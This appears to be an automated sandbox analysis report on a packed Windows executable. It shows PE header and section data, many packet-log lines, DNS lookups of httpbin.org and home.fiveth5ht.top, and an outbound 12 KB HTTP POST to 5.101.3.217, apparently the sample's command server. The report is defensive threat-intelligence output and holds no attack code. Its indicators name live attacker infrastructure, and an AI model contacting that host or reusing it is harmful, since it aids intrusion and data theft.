Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc3b3c8 | 0x10 | lyhwrnys
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3b378 | 0x18 | lyhwrnys
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x6db000 | 0x288a00 | 302fa3d5477d34b6b8e8f343e07af9d3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | f364cf2025365378a947503d0a17f02f | False | 0.580078125 | data | 4.598587805717438 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x6de000 | 0x39d000 | 0x200 | a726e9e64557af7ef80c3eb0d51a46bb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lyhwrnys | 0xa7b000 | 0x1c1000 | 0x1c0600 | 34e3cae9af8503b3e9ae15a0a190ca32 | False | 0.9945647912601059 | data | 7.95526963720531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jcgkpoiz | 0xc3c000 | 0x1000 | 0x400 | e8c898c7352eb3c29b3c6cb16b74c124 | False | 0.82421875 | data | 6.396697672498131 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc3d000 | 0x3000 | 0x2200 | 1c23ef437f21143121d5a638b1b51ede | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc3b3d8 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402

DLL | Import
kernel32.dll | lstrcpy
                                          Dec 27, 2024 08:55:39.503355980 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.703154087 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.703324080 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.947182894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.947243929 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.023097992 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.023307085 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.023392916 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.066791058 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.066937923 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143083096 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143124104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143250942 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143318892 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143353939 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143392086 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143419981 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143508911 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143562078 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143564939 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143613100 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143722057 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143734932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143773079 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143799067 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143867016 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143877983 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143924952 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143975973 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144023895 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144052029 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144099951 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144166946 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144222021 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144223928 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144277096 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144331932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144382000 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144476891 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144562960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144625902 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144701004 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144815922 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144871950 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144941092 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145035028 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145179033 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145270109 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145273924 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145319939 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145343065 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145384073 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145402908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145443916 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145450115 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145490885 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145512104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145558119 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145582914 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145629883 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.186703920 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.186837912 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.227355003 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.227432013 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.263036013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263061047 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263143063 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263165951 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.263219118 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.263252020 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263292074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263478041 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263492107 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263659954 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263700008 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263798952 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263840914 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263946056 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264024973 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264123917 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264162064 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264247894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264275074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264575005 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.264884949 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264895916 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264951944 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265002012 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265059948 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265116930 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265157938 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265166998 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265168905 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265212059 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265259981 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265273094 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265317917 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265405893 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265418053 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265484095 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265491009 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265518904 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265536070 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265573025 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265585899 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265614986 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265635967 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265783072 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265820026 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265975952 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265993118 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266123056 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266171932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266182899 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266192913 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266282082 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266293049 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266359091 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266367912 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266402960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266412020 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266450882 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266459942 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266544104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266554117 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266645908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266654968 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266712904 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266736984 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266807079 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266871929 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266911030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267002106 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267013073 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267024994 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267076969 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.306536913 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.306576014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.347063065 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.382785082 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.382828951 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.382946014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383021116 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383203030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383261919 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383290052 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383667946 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.383784056 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.384120941 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384324074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384462118 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384497881 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384648085 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384809971 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384846926 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385101080 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385211945 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385262966 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385490894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385502100 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385516882 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385628939 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385699034 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385895014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385905027 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386065960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386109114 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386229038 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386295080 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386401892 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386456013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386565924 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386610031 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386723042 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386785030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386868954 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386893988 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387020111 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387088060 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387212992 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387258053 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387355089 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387398958 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387514114 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387533903 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387698889 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387769938 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387914896 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387926102 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388026953 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388036966 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388120890 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388147116 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388274908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388322115 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388434887 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388444901 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388540030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388550043 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388650894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388706923 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388807058 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.389122963 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.389195919 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.503360987 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503380060 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503392935 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503535986 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503556013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503659964 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503694057 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503828049 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503865004 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503989935 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504012108 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504194975 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504316092 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504383087 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504422903 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504494905 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504525900 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504616976 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504643917 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504708052 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504749060 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504846096 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504854918 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504952908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504998922 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505062103 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505094051 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505213022 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505265951 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505330086 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505422115 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505433083 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505436897 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505450964 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505481005 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505573034 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505593061 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505661011 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505712032 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505840063 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505851030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505914927 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505994081 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506083012 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506093025 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506156921 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506217003 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506252050 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506304026 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506378889 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506397963 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506458998 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506488085 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506678104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506973028 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.508826017 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.508882999 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509013891 CET80497365.101.3.217192.168.2.6
                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                          Dec 27, 2024 08:55:33.748888016 CET | 192.168.2.6 | 1.1.1.1 | 0xd6fa | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:33.748954058 CET | 192.168.2.6 | 1.1.1.1 | 0x483 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                          Dec 27, 2024 08:55:38.423804998 CET | 192.168.2.6 | 1.1.1.1 | 0x2bd8 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:38.423883915 CET | 192.168.2.6 | 1.1.1.1 | 0xf4af | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
                                          Dec 27, 2024 08:55:42.762868881 CET | 192.168.2.6 | 1.1.1.1 | 0x78e1 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:42.762868881 CET | 192.168.2.6 | 1.1.1.1 | 0x233e | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
                                          Dec 27, 2024 08:55:45.194472075 CET | 192.168.2.6 | 1.1.1.1 | 0xd1c2 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:45.194539070 CET | 192.168.2.6 | 1.1.1.1 | 0x92a1 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                          Dec 27, 2024 08:55:28.084472895 CET | 1.1.1.1 | 192.168.2.6 | 0xc066 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:28.084472895 CET | 1.1.1.1 | 192.168.2.6 | 0xc066 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:34.049057007 CET | 1.1.1.1 | 192.168.2.6 | 0xd6fa | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:34.049057007 CET | 1.1.1.1 | 192.168.2.6 | 0xd6fa | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:38.561553955 CET | 1.1.1.1 | 192.168.2.6 | 0x2bd8 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:42.900824070 CET | 1.1.1.1 | 192.168.2.6 | 0x78e1 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                          Dec 27, 2024 08:55:45.333853006 CET | 1.1.1.1 | 192.168.2.6 | 0xd1c2 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                          • httpbin.org
                                          • home.fiveth5ht.top
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.6 | 49736 | 5.101.3.217 | 80 | 1460 | C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 27, 2024 08:55:38.937199116 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
